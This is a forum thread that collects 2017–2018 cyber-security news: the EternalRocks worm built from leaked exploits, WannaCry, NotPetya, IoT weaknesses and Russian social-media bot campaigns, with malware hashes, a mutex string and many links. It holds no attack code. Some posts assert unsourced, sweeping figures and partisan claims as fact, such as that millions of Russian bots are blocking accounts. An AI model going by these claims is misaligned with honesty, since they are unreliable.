Entire Russian banking system 25M USDs.....

BTW...a lot of MS W7 was hit inside Russia......

A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.


The security expert Miroslav Stampar, a member of the Croatian Government CERT, has discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw in the SMB protocol to spread itself like the popular WannaCry ransomware.
Stampar#discovered the EternalRocks after it infected his SMB honeypot, he called the malware ‘DoomsDayWorm.’

Stampar#discovered that the EternalRocks disguises itself as WannaCry, but instead of delivering a ransomware, it takes over the affected computer to power other attacks.

The researcher decompiled an older sample (start of May) of EternalRocks and published it on Github.

Unlike the WannaCry Ransomware that leverages the two NSA hacking tools EternalBlue and DoublePulsar, EternalRocks exploits seven exploits leaked by Shadow Brokers and its code doesn’t include a kill-switch.

EternalRockswas developed to avoid detection and to remain undetectable on the target system, it uses the following NSA exploits:

EternalBlue — SMBv1 exploit tool
EternalRomance — SMBv1 exploit tool
EternalChampion — SMBv2 exploit tool
EternalSynergy — SMBv3 exploit tool
SMBTouch — SMB reconnaissance tool
ArchTouch — SMB reconnaissance tool
DoublePulsar — Backdoor Trojan

EternalRocks downloads all the above SMB exploits to the infected computer, then it scans the internet for open SMB ports on other systems to compromise.


Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on
https://github.com/stamparm/EternalRocks/#
…. Will keep it updated, along with @_jsoo_

Update on #EternalRocks. Original name is actually "MicroBotMassiveNet" while author's nick is "tmc" https://github.com/stamparm/EternalRocks/#debug-strings#…

If I will be asked to choose a name, let it be a DoomsDayWorm :D c52f20a854efb013a0a1248fd84aaa95

P.S. there is no kill-switch. Everything goes through Tor. Initial infection by MS17-010 drops Tor binaries for further communication

Somebody actually used complete Shadowbrokers dump (SMB part) and made a worm out of it. Uses WannaCry names (taskhost/svchost) to distract

Seems to be just spreading at the moment and getting further commands from C&C

Whole EternalRocks campaign (first and second stage malware) uses Mutex: {8F6F00C4-B901-45fd-08CF-72FDEFF}

URGENTLY IMPORTANT

It is just a matter of time until common malware through phishing bad guys will incorporate SMB exploits for synergistic attack.

Then, we all die.........

WARNING to US Military and SWJ commenters and readers.....

Kremlin troll @Noclador was right @hardhouz13
Attached Images

Recent on BRZbank hack. Bank hasn't owned up. Incl US accts. Never "exploited [on] such a big scale."Hacked 10/22/16 https://www.wired.com/2017/04/hackers-hijacked-banks-entire-online-operation/#…

The economic impact of cybercrime will reach $8 Trillion by 2022

According to a report published by Juniper Research, the economic impact of cybercrime is expected to reach $8 trillion price tag over the next five years. According to a report published by Juniper Research, the number of data records that will be compromised...

We are only 5 years away from achieving this......

Vault7: CIA Pandemic implant turns file servers into malware infectors

Wikileaks released a new lot of documents belonging to the Vault7 dump that details the CIA project codenamed 'Pandemic implant' Wikileaks released a new batch of documents belonging to the#Vault7 archive related to#the CIA project codenamed 'Pandemic.'

https://twitter.com/wikileaks/status/870332839270780928

There are a number of posts here and on other threads which: a) have quoted text in excess of the 'Fair Use' principle, which opinion suggests 400-600 words can be cited; b) lack any citation to their origin / source.

The Forum relies on the guidance from Stanford University Libraries via:http://fairuse.stanford.edu/

It refers to 'Fair Use' as:
The less you take, the more likely that your copying will be excused as a fair use.Within:http://fairuse.stanford.edu/overview/fair-use/four-factors/

SWJ has had encounters with copyright before and it is an area we wish to steer clear of - for very simple reasons.

If the recent posts can have attribution they will have to be deleted, please update them or send them via a PM with the Post Number to me.

Updated 16th June 2017: ten posts deleted which lack any cited source after no response from author.

A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.



Miroslav Stampar @stamparm
Just captured 406ac1595991ea7ca97bc908a6538131 and 5c9f450f2488140c21b6a0bd37db6a40 in MS17-010 honeypot. MSIL/.NET #WannaCry copycat(s)

Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on
https://github.com/stamparm/EternalRocks/#
…. Will keep it updated, along with @_jsoo_

Update on #EternalRocks. Original name is actually "MicroBotMassiveNet" while author's nick is "tmc" https://github.com/stamparm/EternalRocks/#debug-strings#…

If I will be asked to choose a name, let it be a DoomsDayWorm :D c52f20a854efb013a0a1248fd84aaa95

P.S. there is no kill-switch. Everything goes through Tor. Initial infection by MS17-010 drops Tor binaries for further communication

Somebody actually used complete Shadowbrokers dump (SMB part) and made a worm out of it. Uses WannaCry names (taskhost/svchost) to distract

Seems to be just spreading at the moment and getting further commands from C&C

Whole EternalRocks campaign (first and second stage malware) uses Mutex: {8F6F00C4-B901-45fd-08CF-72FDEFF}

http://securityaffairs.co/wordpress/
Who then rewrote the researchers published in public domain notes....
#

At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.


http://securityaffairs.co/wordpress/
Who then rewrote the researchers published in public domain notes....
#

Experts killed tens of thousands of subdomains used by crooks to host the RIG Exploit Kit that were set up with a domain shadowing campaign.



http://securityaffairs.co/wordpress/

Who then rewrote the researchers published in public domain notes....

It's just getting a bit worse every day... New @wikileaks documents reveal how the CIA is hacking into your router
https://www.wired.com/story/wikileaks-cia-router-hack/#

BTW...routers were never ever that secure......to begin with...

Ether Thief Remains Mystery Year After $55 Million Digital Heist
https://www.bloomberg.com/features/2017-the-ether-thief/#

Well worth reading as a number of malware and or other exploits result actually from poorly written code....and or IEEE issues not recognized by computer engineers...

US-CERT‏#@USCERT_gov 13. Juni

TA17-164A: HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
http://bit.ly/2sxPRAT

The 3 Biggest Lies About the Internet of Things https://safeandsavvy.f-secure.com/2017/06/12/the-3-biggest-lies-about-the-internet-of-things/#…

The 3 Biggest Lies About the Internet of Things https://safeandsavvy.f-secure.com/2017/06/12/the-3-biggest-lies-about-the-internet-of-things/#…

Talking to a couple cyber security SMEs recently it would appear one of the biggest threats are high volume, low cost IoT devices like IP security cameras that have very short product development and sales life cycles(measured in months rather than years).

Lots of persistent vulnerabilities in cheap IoT hardware's firmware that can result in very large and easy to build attack arrays.

Moore's Law combined with commercial market forces means that this environment of large volume vulnerabilities occurring with each cheap IoT device generation is unlikely to be mitigated without intervention.

I would suspect that some form of intervention will be required, possibly along the lines of public/private partnership such as certification.

CE or UL are symbols used to identify compliant appliances for categories like electrical/fire safety.

I suspect we will need some form of IoT device compliance through certification or litigation.

Or in emergencies, the ability to remotely identify, locate, and negate them.

Ralph Nader's "Unsafe at any speed" but instead of targeting the Corvair and greater car industry in terms of safety standards and features, but for the IoT age.

This is not an original thought as I found it elsewhere first, but there's also the potential for some jurisdictions to "conscript" devices.

We have moved beyond conscripting humans to work on behalf of sovereign government in most instances, but our devices being conscripted is an entirely different story and not beyond the realm of believability to preempt a crisis and enhance national resilience.

Cited in part:
Talking to a couple cyber security SMEs recently it would appear one of the biggest threats are high volume, low cost IoT devices like IP security cameras that have very short product development and sales life cycles(measured in months rather than years).

This IMHO is one of the most serious points of internet security that urgently needs an answer as it is virtually impossible to constantly update all the various built-in firmware issues for literally thousands of IoTs...down to your for IoT enabled refrigerator.....or TV or baby monitoring device....

South Korean hosting co. pays $1m ransom to end eight-day outage
Criminals were talked down from 4.4M USDs...


https://www.theregister.co.uk/2017/06/20/south_korean_webhost_nayana_pays_ransom/

Honda halts Japan car plant after WannaCry virus hits computer network
http://reut.rs/2sU6jvK

Nuclear war fears had a public component of "duck and cover".

Cyber war fears should have a public component of "patch and update".

Here in NZ, due to our recent and serious seismic activity, we've had a national resilience campaign for personal preparation in case of a future disaster.

I believe strongly that we are well past the point where we should be conducting national continuous "patch and update" campaigns, to the point of aggressive nudging behaviour in perpetual pursuit of herd device immunity.

"Loose lips sink ships" for the age of interconnectivity.

Quantum entanglement as a means of potential cyber/coms resilience:

https://www.scientificamerican.com/article/china-shatters-ldquo-spooky-action-at-a-distance-rdquo-record-preps-for-quantum-internet/

I knew quantum computing would be an eventual game changer with even recent 1024 bit encryption, but was unaware of quantum entanglement being used as a potential tool to defend against hacking and cracking.

It's way over my head, but Moore's Law continues on its 52 year relentless journey.

A cyber attack the world isn't ready for

https://www.nytimes.com/2017/06/22/technology/ransomware-attack-nsa-cyberweapons.html

Wannacry is the focus, but Doublepulsar backdoor may be a bigger threat

BTW...while the US Congress approved 200M USDs to fight Russian info warfare BUT US social media FB, Twitter, Instagram and others seem to be unable to control hate, violence and propaganda being posted minute by minute EVEN though they admit they could....

BTW...the Trump government has promised a propaganda pushback but not spent a single cent of the 200M USD...

BTW...the Germans have effectively told the US social media companies to either control what they know they can actually control and if not then 50K Euros per violation.....ACTUALLY not a problem for them to pay the fines as they make billions.....

At least the Germans are doing something compared to the apparent inaction of Trump who has 200M USDs to spend in this effort....

Snapchat launches new feature that lets people know where you are at any moment

Not good for your own personal safety....

A former employee was sentenced to one year and one day in prison for damaging the IT networks of several water utility providers across the US East Coast.
http://securityaffairs.co/wordpress/60425/cyber-crime/water-utility-networks-hacked.html



Adam Flanagan (42) of Bala Cynwyd, PA was sentenced to#one year and one day in prison by a Pennsylvania court#for#damaging the IT networks of several water utility providers across the US East Coast.
The news was reported by#Bleeping Computer, the man#worked between November 2007 and November 2013 as engineer for an unnamed company that manufactured smart water, electric, and gas readers.
Among the Flanagan’s tasks, there was the set up#of Tower Gateway Basestations (TGB) for the customers, which were mainly water utility networks.
The Tower Gateway Basestations#are essential components for water facility networks composed of smart meters installed at people’s homes that exchange data with water facility operators’ systems.
These networks allow water facility operators to collect consumption#data and check the status of the installs at the customers’ homes.
On November 16, 2013, the company fired#Flanagan for undisclosed reasons, then the man decided to punish the company by shutting down the TGB stations paralyzing the water facility networks of the company customers. Flanagan also changed passwords on some TGBs, using offensive words.
The utility providers had to send out employees at customer homes to collect monthly readings about their consumption.
“According to court documents, the FBI tracked down Flanagan’s actions to six incidents in five cities across the US East Coast: Aliquippa (Pennsylvania), Egg Harbor (New Jersey), Kennebec (Maine), New Kensington (Pennsylvania), and Spotswood (New Jersey).”reported#Catalin Cimpanu#from#Bleepingcomputer.

The investigators were able to identify the former employee as the responsible of the incidents, then the US authorities filed charges on November 22, 2016.#Flanagan faced a maximum sentence of 90 years in prison, plus a $3 million fine. He pleaded guilty on March 7, 2017, before receiving his sentence on June 14, 2017.
Flanagan faced a maximum sentence of 90 years in prison, plus a $3 million fine. He pleaded guilty on March 7, 2017#and on June 14, 2017 he was sentenced to one year in the jail, let me say that judges were clement.

Pinkslipbot banking Trojan exploiting infected machines as control servers
http://securityaffairs.co/wordpress/60233/malware/pinkslipbot-banking-trojan.html


Pinkslipbot banking Trojan is a banking Trojan that uses a complicated multistage proxy for HTTPS-based control server communication. Security researchers at McAfee Labs have spotted a new strain of the Pinkslipbot banking malware (also known as QakBot/QBot)

!!! Zero-day Skype flaw causes crashes, remote code execution (CVE-2017-9948) -

NOTE

All of the running information on the Russian deliberate cyber attack on Ukraine is being threaded on the Russian propaganda thread....as it is in fact a Russian targeted cyber attack...especially when one "sees" the control servers sitting deep inside Russia.....

Useful analyses on Petya, the camouflaged wiper targeting Ukraine

https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/ … https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4?source=linkShare-8c278323b47c-1498684536 … https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/ …

Puppet Strings - Dirty Secret for Free Windows Ring 0 Code Execution https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html …

Petya’s kill-chain diagram in Windows 10. Device Guard, Credential Guard, UEFI Secure Boot, AppLocker, KASLR, HALNX

https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/?platform=hootsuite …

ThreadContinue - Reflective Injection Using SetThreadContext() and NtContinue()
https://zerosum0x0.blogspot.com/2017/07/threadcontinue-reflective-injection.html …

Petya’s kill-chain diagram in Windows 10. Device Guard, Credential Guard, UEFI Secure Boot, AppLocker, KASLR, HALNX

https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/?platform=hootsuite …

One interesting item is the limited execution time of 60 minutes.

I'm not a cyber SME, but I wonder where 60 minutes sits on the continuum?

If on the low end, and assuming it was done so intentionally, does that mean this might have been meant as both an intentional attack(not ransomware) on Ukraine as well as a message NATO/EU/US unlikely to draw a direct cyber counterattack?

To me, if the 60 minute execution time is quite short, then it would seem to be designed to burn out like digital Ebola with a limited incubation period, instead of lingering like the Plague.

One interesting item is the limited execution time of 60 minutes.

I'm not a cyber SME, but I wonder where 60 minutes sits on the continuum?

If on the low end, and assuming it was done so intentionally, does that mean this might have been meant as both an intentional attack(not ransomware) on Ukraine as well as a message NATO/EU/US unlikely to draw a direct cyber counterattack?

To me, if the 60 minute execution time is quite short, then it would seem to be designed to burn out like digital Ebola with a limited incubation period, instead of lingering like the Plague.

You have some interesting comments....there is nothing by accident on this malware....appears to be sloppy in coding but highly destructive when unleashed...appears to be ransomware but it is really a wiper of MBF of computer...and interestingly when detected by say AV or MS Defender software it immediately starts to destroy the MBF with no hesitation whatsoever...

Coupled with a LASDump hacking tool designed to collect all passwords laterally from the infected pc as well as all lateral domain servers and pass that info via exfil then this was in fact a highly thought through cyber attack...setting up the network for future easier attacks...

BTW..you are correct..by appearing to be at first a ransomware they slide under the Article 5 radar......that was intentional...

Alone the damage to Maersk Shipping was a total of 480M USDs...that is a lot of damage for a so called ransomware.

PLUS the choice of targets were exactly what you would expect from a direct cyber invasion...banks and ATMs, fuel points, food stores, radio and TV and social media, transportation ground and air and the central bank....all designed to create panic and confusion in the first hours...

https://www.theguardian.com/technology/2017/jun/28/notpetya-ransomware-attack-ukraine-russia


A ransomware attack that affected at least 2,000 individuals and organisations worldwide on Tuesday appears to have been deliberately engineered to damage IT systems rather than extort funds, according to security researchers.
The attack began in Ukraine, and spread through a hacked Ukrainian accountancy software developer to companies in Russia, western Europe and the US. The software demanded payment of $300 (£230) to restore the user’s files and settings.
The malware’s advanced intrusion techniques were in stark contrast with its rudimentary payment infrastructure, according to a pseudonymous security researcher known as “the grugq”.

The researcher said the software was “definitely not designed to make money” but “to spread fast and cause damage, [using the] plausibly deniable cover of ‘ransomware’”.
This analysis was supported by UC Berkley academic Nicholas Weaver, who told the infosec blog Krebs on Security: “I’m willing to say with at least moderate confidence that this was a deliberate, malicious, destructive attack or perhaps a test disguised as ransomware.”

In early May six U.S. intelligence and law enforcement agency chiefs were asked in an open Senate hearing whether they’d let their networks use Kaspersky software, often found on Best Buy shelves. The answer was a unanimous and resounding no. The question, from Florida Republican Marco Rubio, came out of nowhere, often a sign a senator is trying to indirectly draw attention to something learned in classified briefings.

Eugene Kaspersky took to Reddit to respond. Claims about Kaspersky Lab’s ties to the Kremlin are “unfounded conspiracy theories” and “total BS,” the company’s boisterous, barrel-chested chief executive officer wrote.
https://www.bloomberg.com/news/articles/2017-07-11/kaspersky-lab-has-been-working-with-russian-intelligence#

WARNING

Russian trolls are attacking twitter users with an app that makes Twitter think you're trying to approve a malicious third party app, causing Twitter to lock your account for safety reasons.

Don't fret, you've not been hacked, this is part... of an intense pro-active troll-farm op designed to keep users from discussing the crumbling Trump presidency.

Russia sees their asset (Trump) falling apart and are doing everything to control the news. It's a hail-mary pass.

Today we have seen over 2.5M Russian controlled Twitter bots swarming out to block as many anti Trump twitter accounts that are reporting on anything pertaining to Trump, Trump Jr. and Russians.

Currently Trump Followers have climbed to 1.8M in just under four weeks AND all are non human bots that is averaging 450K per week and that costs a lot of money to create even on the criminal side of twitter.

This is a concentrated attack against non Trump supporters on Twitter AND Twitter Support has remained largely silent.....WHY is that.

This is the third type of Russian twitter attack in the last ten days...

There is now a true Russian social media info war and it is up front and in your face and the US government also says nothing.

WARNING

Private Email of Top U.S. Russia Intelligence Official Hacked http://foreignpolicy.com/2017/07/14/private-email-of-top-u-s-russia-intelligence-official-hacked/#…

Some are saying APT28 GRU again.

WARNING

MASSIVE TROLL ACTIVITY: Do not click on any links from anyone you don't know. 1000s of compromised accts in past 24 hours.

WARNING

Russian trolls are attacking twitter users with an app that makes Twitter think you're trying to approve a malicious third party app, causing Twitter to lock your account for safety reasons.

Don't fret, you've not been hacked, this is part... of an intense pro-active troll-farm op designed to keep users from discussing the crumbling Trump presidency.

Russia sees their asset (Trump) falling apart and are doing everything to control the news. It's a hail-mary pass.

Today we have seen over 2.5M Russian controlled Twitter bots swarming out to block as many anti Trump twitter accounts that are reporting on anything pertaining to Trump, Trump Jr. and Russians.

Currently Trump Followers have climbed to 1.8M in just under four weeks AND all are non human bots that is averaging 450K per week and that costs a lot of money to create even on the criminal side of twitter.

This is a concentrated attack against non Trump supporters on Twitter AND Twitter Support has remained largely silent.....WHY is that.

This is the third type of Russian twitter attack in the last ten days...

There is now a true Russian social media info war and it is up front and in your face and the US government also says nothing.

Seems anyone criticizing Putins invasion of Ukraine is on the list. Mine was locked out early this morning.

There is a concentrated attempt by Russian trolls and bots to block all anti Trump and proUkraine Twitter accounts

This landed via a local university IT advisory alert:
Apple released a critical update (iOS 10.3.3) on Wednesday 19 July to update security vulnerabilitieswithin your contacts, messages, notifications and Safari. This affects the following devices: iPhone 5 to iPhone 7, fourth-generation iPad and later versions, and the iPod Touch 6th generation. Instructions on how to update the iOS software can be found here:https://support.apple.com/en-gb/HT204204
More information on the update can be found here:https://www.cnet.com/news/apple-security-update-iphone-ipad-ios-hack-broadpwn/

For the last three months my IT company, together with German partners, @bellingcat, DFLab and tens of twitter users have been literally in a state of open non violent bot army war and believe me they do exist and Russia is extremely good at using them for disinformation, propaganda, spamming and criminal hacking.

This has now reached a certain sophistication that is not normal on the part of Russian intel services so that one can actually use the term open info war fought 24 x 7 X 365 for the heart and soul of a society

Since the Russia infowar thread is closed I will post all links that are available on this thread as it does apply to malware, disinformation and propaganda and hacking all tied into one namely bots.

Enjoy the reading and hopefully one can learn what really Russian infowarfare looks like in the 21st century

https://medium.com/dfrlab/kremlin-and-alt-right-share-nazi-narrative-2df4af60c749

https://www.propublica.org/article/pro-russian-bots-take-up-the-right-wing-cause-after-charlottesville

http://www.moonofalabama.org/

IMPORTANT
https://twitter.com/conspirator0

https://medium.com/dfrlab/german-election-the-curious-case-of-the-far-right-feed-84cc7a8dabd9

https://medium.com/dfrlab/german-election-merkelmussweg-explained-b218dd6d4b7f

https://docs.google.com/document/d/1BfLPJpRtyq4RFtHJoNpvWQjmGnyVkfE2HYoICKOGguA/edit

http://www.politico.com/magazine/story/2017/08/23/russia-propaganda-network-kremlin-bots-215520

https://medium.com/@d1gi/can-elections-be-bot-970d4b4ae430

https://medium.com/@d1gi/who-hacked-the-election-43d4019f705f

https://medium.com/@d1gi/election2016-propaganda-lytics-weaponized-shadow-trackers-a6c9281f5ef9

https://medium.com/@d1gi/the-election2016-micro-propaganda-machine-383449cc1fba

https://medium.com/dfrlab/from-russia-with-hategroup-ae6ee4318b5b

.@Twitter bots in action - #Russian #informationwarfare methods designed for "easy exploitation - high impact"
http://bit.ly/2p3b30p

IoT malware clashes in a botnet territory battle
http://www.cio.com/article/3190179/s...y-battle.html#

https://www.technologyreview.com/s/603404/cybersecurity-experts-uncover-dormant-botnet-of-350000-twitter-accounts/

Ref: arxiv.org/abs/1701.02405:
The “Star Wars” botnet with >350k Twitter bots

https://www.wired.com/story/leaked-alt-right-chat-logs-are-key-to-charlottesville-lawsuits

https://medium.com/dfrlab/botspot-twelve-ways-to-spot-a-bot-aedc7d9c110c

https://twitter.com/DFRLab

https://medium.com/@mentionmapp/fakenews-getting-real-socialbots-swamping-propublica-37a96c518b89

https://medium.com/@Felt/grand-theory-supp-4-abc25d6a8756

http://www.independent.co.uk/news/uk/home-news/david-jones-pro-brexit-ukip-twitter-account-russia-fake-bot-troll-trump-disinformation-followers-a7920181.html

How a Bot Army Probably Got Me Kicked Off Twitter
http://www.thedailybeast.com/how-a-bot-army-probably-got-me-kicked-off-twitter?source=twitter&via=mobile

$20 says the Kremlin just ordered three gross of this product.
https://www.theverge.com/2017/11/10/16634442/lovense-sex-toy-spy-surveillance

Could terrorists hijack an airliner remotely by hacking into its cockpit controls, putting its fate in their hands?
This question is being asked because of the revelation that a team of cyber experts at the Department of Homeland Security successfully hacked into the avionics of a commercial airplane parked at an airport as part of a test.
The problem is that nobody with knowledge of aviation cyber security is sure of how vulnerable airplanes are to such an attack—and some believe that the DHS test has simply added to the confusion and created needless alarm.
A Boeing spokesman told The Daily Beast: “We witnessed the test and can say unequivocally that there was no hack of the airplane’s flight control systems.”
Information about the extent of the test is restricted and there is a strong feeling among hacking experts that the full extent of the threat will remain underestimated—as they claim it has been for years.

https://www.thedailybeast.com/could-terrorists-hack-an-airplane-the-government-just-did

For the last three months my IT company, together with German partners, @bellingcat, DFLab and tens of twitter users have been literally in a state of open non violent bot army war and believe me they do exist and Russia is extremely good at using them for disinformation, propaganda, spamming and criminal hacking.

This has now reached a certain sophistication that is not normal on the part of Russian intel services so that one can actually use the term open info war fought 24 x 7 X 365 for the heart and soul of a society

Since the Russia infowar thread is closed I will post all links that are available on this thread as it does apply to malware, disinformation and propaganda and hacking all tied into one namely bots.

Enjoy the reading and hopefully one can learn what really Russian infowarfare looks like in the 21st century

https://medium.com/dfrlab/kremlin-and-alt-right-share-nazi-narrative-2df4af60c749

https://www.propublica.org/article/pro-russian-bots-take-up-the-right-wing-cause-after-charlottesville

http://www.moonofalabama.org/

IMPORTANT
https://twitter.com/conspirator0

https://medium.com/dfrlab/german-election-the-curious-case-of-the-far-right-feed-84cc7a8dabd9

https://medium.com/dfrlab/german-election-merkelmussweg-explained-b218dd6d4b7f

https://docs.google.com/document/d/1BfLPJpRtyq4RFtHJoNpvWQjmGnyVkfE2HYoICKOGguA/edit

http://www.politico.com/magazine/story/2017/08/23/russia-propaganda-network-kremlin-bots-215520

https://medium.com/@d1gi/can-elections-be-bot-970d4b4ae430

https://medium.com/@d1gi/who-hacked-the-election-43d4019f705f

https://medium.com/@d1gi/election2016-propaganda-lytics-weaponized-shadow-trackers-a6c9281f5ef9

https://medium.com/@d1gi/the-election2016-micro-propaganda-machine-383449cc1fba

https://medium.com/dfrlab/from-russia-with-hategroup-ae6ee4318b5b

.@Twitter bots in action - #Russian #informationwarfare methods designed for "easy exploitation - high impact"
http://bit.ly/2p3b30p

IoT malware clashes in a botnet territory battle
http://www.cio.com/article/3190179/s...y-battle.html#

https://www.technologyreview.com/s/603404/cybersecurity-experts-uncover-dormant-botnet-of-350000-twitter-accounts/

Ref: arxiv.org/abs/1701.02405:
The “Star Wars” botnet with >350k Twitter bots

https://www.wired.com/story/leaked-alt-right-chat-logs-are-key-to-charlottesville-lawsuits

https://medium.com/dfrlab/botspot-twelve-ways-to-spot-a-bot-aedc7d9c110c

https://twitter.com/DFRLab

https://medium.com/@mentionmapp/fakenews-getting-real-socialbots-swamping-propublica-37a96c518b89

https://medium.com/@Felt/grand-theory-supp-4-abc25d6a8756

http://www.independent.co.uk/news/uk/home-news/david-jones-pro-brexit-ukip-twitter-account-russia-fake-bot-troll-trump-disinformation-followers-a7920181.html

How a Bot Army Probably Got Me Kicked Off Twitter
http://www.thedailybeast.com/how-a-bot-army-probably-got-me-kicked-off-twitter?source=twitter&via=mobile

Is this all connected to this Russian RT translated Kommersant news from 2012?


Third, and probably most important, of the systems is Storm-12 – its task is to automatically spread the necessary information through the blogosphere, as well as “information support of operations with pre-prepared scenarios of influence on mass audience in social networks.”

The first two systems are to be ready by the end of 2012 and the third by 2013.

https://www.rt.com/politics/intelligence-orders-influencing-social-619/

Comment to my last post. SVR tender timing seems to be directly connected to Putin's 2011. december Bolotnaya and spring 2012 mass protest problem. Putin's people failed to control social-networking platforms. Due to technical and political reasons especially Facebook and Twitter. 2016. US elections show they have found modus operandi.

$20 says the Kremlin just ordered three gross of this product.
https://www.theverge.com/2017/11/10/16634442/lovense-sex-toy-spy-surveillance

You people in the Peanut Gallery thought I was kidding. Anna Chapman's probably already filling out the Amazon . com order page.


A British company has released the first pictures of a ‘smart condom’ which collects very intimate data about the sex life of anyone brave enough to wear it. The device is called the i.Con and can detect STIs as well as sending data about a sex session straight to the wearer’s smartphone.

Read more: http://metro.co.uk/2017/11/28/worlds-first-spy-condom-collects-intimate-data-during-sex-and-tells-men-whether-their-performance-is-red-hot-or-a-total-flop-7116049

(CNN)White House homeland security adviser Tom Bossert said Monday the United States believes North Korea was behind the "WannaCry" cyberattack earlier this year.
"After careful investigation, the US today publicly attributes the massive 'WannaCry' cyberattack to North Korea," Bossert wrote in a Wall Street Journal op-ed.
He continued, "The attack was widespread and cost billions, and North Korea is directly responsible."
http://www.cnn.com/2017/12/18/politics/white-house-tom-bossert-north-korea-wannacry/index.html

Previous posts-in-thread on WannaCry.
http://council.smallwarsjournal.com/search.php?searchid=6713937
You're welcome.

WASHINGTON (AP) — Russian cyberspies pursuing the secrets of military drones and other sensitive U.S. defense technology tricked key contract workers into exposing their email to theft, an Associated Press investigation has found.
What ultimately may have been stolen is uncertain, but the hackers clearly exploited a national vulnerability in cybersecurity: poorly protected email and barely any direct notification to victims.
The hackers known as Fancy Bear, who also intruded in the U.S. election, went after at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms or other sensitive activities, the AP found.
https://www.apnews.com/cc616fa229da4d59b230d88cd52dda51/Russian-hackers-hunt-hi-tech-secrets,-exploiting-US-weakness

LOS ANGELES — Buyer beware. If you’ve snapped up a smart TV, with built-in Netflix, YouTube, Hulu and other Web connections, heads up on this warning — your smart TV could make you vulnerable to hackers and is probably monitoring more of your viewing than you realize.
Consumer Reports just analyzed smart TVs from five big U.S. TV brands — Samsung, LG, Sony, TCL and Vizio — and found several problems. All can track what consumers watch, and two of the brands failed a basic security test.
How bad is the security? So poor, according to its report, that hackers were able to take over complete remote control of the TVs from Samsung and TCL's branded Roku TV, which included changing channels, upping the volume, installing new apps and playing objectionable content from YouTube.
"What we found most disturbing about this was the relative simplicity of" hacking in, says Glenn Derene, Consumer Reports' senior director of content.

https://www.usatoday.com/story/tech/talkingtech/2018/02/07/your-smart-tv-may-prey-hackers-and-collecting-more-info-than-you-realize-consumer-reports-warns/311903002/